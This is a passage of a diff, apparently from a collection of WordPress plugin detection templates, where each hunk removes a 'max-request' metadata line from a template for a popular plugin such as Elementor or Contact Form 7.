wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200

Some files were not shown because too many files have changed in this diff Show More